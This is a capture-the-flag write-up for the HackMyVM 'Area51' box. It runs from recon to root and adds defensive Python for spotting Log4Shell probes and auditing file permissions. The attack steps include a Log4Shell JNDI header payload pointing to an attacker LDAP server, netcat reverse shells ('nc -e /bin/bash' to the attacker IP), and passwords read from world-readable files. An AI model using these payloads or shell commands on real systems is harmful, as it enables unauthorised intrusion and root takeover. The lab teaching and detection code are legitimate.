HackMyVM - Area51


Area51 by bit is listed as medium difficulty; this is very subjective!!!
It is difficult to find the correct request to get the initial foothold, but subsequent steps are a bit more straightforward.

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit
[sudo] password for kali: 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.0.1        08:00:27:96:87:13      1      60  PCS Systemtechnik GmbH
 10.0.0.104      08:00:27:e9:7a:77      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 06:24 EST
Nmap scan report for 10.0.0.104
Host is up (0.00072s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: FBI Access
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.76 seconds


└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.104/ -x html,php,txt -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.104/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/12/26 06:31:54 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 1131]
/radar                (Status: 200) [Size: 730]
/video                (Status: 200) [Size: 4655]
/note.txt             (Status: 200) [Size: 119]
/moon                 (Status: 200) [Size: 440]
/server-status        (Status: 403) [Size: 275]


So we have ssh (22), which seems like it will accept a username & password;
http (80) with some rather fun html5 pages and a note.txt, but I didn't find anything else interesting;
and http (8080), which seems to just return a JSON bad request to all paths tried.

RCE to shell

From the note.txt (and the fact it was a 1.8Gb download!) it is reasonable to think port 8080 is Apache Tomcat and susceptible to Log4j RCE... if the correct request can be found.
I downloaded the GitHub repo.

┌──(kali㉿kali)-[~/area51]
└─$ git clone https://github.com/kozmer/log4j-shell-poc.git

This also required a JDK download from Oracle to allow it to build the custom Java exploit files.
(Follow the README!)

This vulnerable app uses the path /login so I still need to find another example :(
Some searching and a few attempts later....
https://www.lunasec.io/docs/blog/log4j-zero-day/
This example expects the request header "X-Api-Version"

└─$ curl -H 'X-Api-Version:1' http://10.0.0.104:8080/
Hello, world! 

So this looks like the right app!
As I already have the "kozmer" version installed and setup I continued with that one.

3 terminal sessions are required:
1. netcat listener on port 9001 (default for the exploit repo)

2. the python script to build and host the exploit

└─$ python3 poc.py --userip 10.0.0.10

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://10.0.0.10:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000

Listening on 0.0.0.0:1389


3. a session to issue the curl command.

└─$ curl -H 'X-Api-Version:${jndi:ldap://10.0.0.10:1389/a}' http://10.0.0.104:8080/

└─$ nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.104] 47558
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)


And we have a shell, but looking around, it's inside a Docker container.
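The request above works because the application behind port 8080 logs the X-Api-Version header through a vulnerable Log4j, and the ${jndi:...} lookup in that header is what triggers the outbound LDAP fetch. From the defending side, that header value is exactly what you want to catch in access logs, a reverse proxy or a WAF. The script below is an added example written for this post, not part of the original write-up or of the PoC repo it uses; it normalises the common obfuscations (URL encoding, nested ${lower:...} and ${...:-x} default-value lookups) before matching. The log lines it scans are constructed samples, and example.invalid is a placeholder host.

```python
import re
import urllib.parse

# Constructed sample request-log lines (not taken from the original post).
# Line 0 is the benign probe the write-up sends; lines 1-3 carry the lookup
# string in plain, nested-lookup and URL-encoded forms; line 4 is a non-JNDI
# lookup that must not fire.
SAMPLE_LINES = [
    'GET / HTTP/1.1 "X-Api-Version: 1"',
    'GET / HTTP/1.1 "X-Api-Version: ${jndi:ldap://10.0.0.10:1389/a}"',
    'GET / HTTP/1.1 "User-Agent: ${${lower:j}ndi:${::-l}dap://example.invalid/x}"',
    'GET /?v=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fx%7D HTTP/1.1',
    'GET / HTTP/1.1 "X-Api-Version: ${java:version}"',
]

# Innermost ${...} lookup: a body that contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# What we ultimately want to see once the obfuscation is stripped away.
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def _collapse(match):
    """Evaluate one innermost lookup the way Log4j 2.x would, conservatively.

    ${jndi:...} is left untouched so the outer matcher can see it.
    ${lower:x} / ${upper:x} become x; ${anything:-x} becomes its default x.
    Any other lookup is left as-is (we never resolve env vars or the like).
    """
    body = match.group(1)
    if body.lstrip().lower().startswith('jndi:'):
        return match.group(0)
    if ':-' in body:
        return body.rsplit(':-', 1)[1]
    head, sep, rest = body.partition(':')
    if sep and head.strip().lower() in ('lower', 'upper'):
        return rest
    return match.group(0)


def normalize(text, max_rounds=10):
    """URL-decode (twice, to cover double encoding) and collapse nested
    lookups until the string stops changing or max_rounds is reached."""
    for _ in range(2):
        text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        new_text = INNER_LOOKUP.sub(_collapse, text)
        if new_text == text:
            break
        text = new_text
    return text


def is_jndi_probe(line):
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines):
    """Return the indexes of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == '__main__':
    for i in scan(SAMPLE_LINES):
        print(f'probe on line {i}: {SAMPLE_LINES[i]}')
```

Pattern matching only catches the encodings you anticipated, so treat it as a detection aid rather than the fix: the fix for the application on 8080 is to upgrade Log4j (or remove the JndiLookup class from the classpath) and to block outbound LDAP/RMI from application hosts, so a lookup that does slip through cannot reach back to port 1389 the way the session above does. The outbound connection itself is the other good detection point.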

Escalate to user

Downloading linpeas.sh and looking at the output identified:

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-------    1 root     root         32768 Dec 24 12:00 /tmp/hsperfdata_root/1
-rwxr-xr-x    1 root     root           194 Dec 19 23:11 /tmp/rev.elf
-rw-r--r--    1 root     root            10 Dec 19 19:19 /var/tmp/.roger


That contained a password, so a nice stable ssh session can be made as roger.
(Just need to ctrl+c out of the custom logon script.)

Escalate to root

Downloading and running linpeas.sh again and looking through the output:

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
  Group roger:
/etc/pam.d/kang

That contains the password for kang.
kang's home directory has something odd happening: a file keeps appearing and disappearing.

kang@area51:~$ ls
weComeInPeace.sh
kang@area51:~$ ls
kang@area51:~$ ls
kang@area51:~$ ls
weComeInPeace.sh
kang@area51:~$ cat *
echo hi
kang@area51:~$ echo "echo test >/tmp/test" > test.sh
kang@area51:~$ ls /tmp/test -l
-rw-r--r-- 1 root root 5 Dec 24 12:02 /tmp/test
kang@area51:~$ echo "nc -e /bin/bash 10.0.0.10 4444" >test.sh

So it does look like root creates a shell script, executes all the .sh files and deletes them,
so a simple reverse shell is a quick solution.

$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.104] 34830
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@area51:/# 
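Both escalations on this box come down to file ownership and permissions: a PAM configuration file under /etc/pam.d that the roger group can write, and a root job that globs and executes every .sh in a home directory the user controls. The check below is an added example written for this post, not part of the original write-up or of linpeas; it reports files that a privileged process should not execute or parse because they are not owned by the expected uid, are writable by group or others, or are not regular files. The demo() function builds a throwaway directory with constructed files named after the scripts in the post rather than touching the real system.

```python
import os
import stat
import tempfile


def risky_files(directory, trusted_uid=0, suffix=None):
    """Map file name -> list of reasons for entries in `directory` that a
    privileged job must not execute or trust as configuration.

    A file is flagged when it is not a regular file (symlinks included),
    is not owned by `trusted_uid`, or is writable by group or others.
    `suffix` restricts the check, e.g. '.sh' for a directory of scripts.
    """
    findings = {}
    for name in sorted(os.listdir(directory)):
        if suffix and not name.endswith(suffix):
            continue
        path = os.path.join(directory, name)
        st = os.lstat(path)  # lstat: judge the link itself, never its target
        reasons = []
        if not stat.S_ISREG(st.st_mode):
            reasons.append('not a regular file')
        if st.st_uid != trusted_uid:
            reasons.append(f'owned by uid {st.st_uid}, expected {trusted_uid}')
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append('writable by group or others (mode %04o)'
                           % stat.S_IMODE(st.st_mode))
        if reasons:
            findings[name] = reasons
    return findings


def _write(path, content, mode):
    with open(path, 'w') as fh:
        fh.write(content)
    os.chmod(path, mode)


def demo():
    """Audit a constructed directory that mimics kang's home.

    weComeInPeace.sh: owned by us, mode 0644, so the trusted uid is the only
    writer and it is not reported.
    test.sh: group-writable (0664), the kind of file the post's root job
    would execute without question.
    link.sh: a symlink, which a globbing job would also follow.
    """
    me = os.getuid()
    with tempfile.TemporaryDirectory() as d:
        _write(os.path.join(d, 'weComeInPeace.sh'), 'echo hi\n', 0o644)
        _write(os.path.join(d, 'test.sh'), 'echo test >/tmp/test\n', 0o664)
        os.symlink('/bin/sh', os.path.join(d, 'link.sh'))
        return risky_files(d, trusted_uid=me, suffix='.sh')


if __name__ == '__main__':
    for name, reasons in demo().items():
        print(f'{name}: {"; ".join(reasons)}')
    # On a real host the same call covers the first finding from the post:
    # risky_files('/etc/pam.d') should return {}; here it would have listed kang.
```

The audit is the easy half; the design fix is that a root job should execute one fixed, root-owned script from a root-owned directory and never glob a user's home, and PAM configuration should be root-owned and mode 0644. Running this check from a cron job or a configuration-management test will surface the group-writable file before a local user does.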

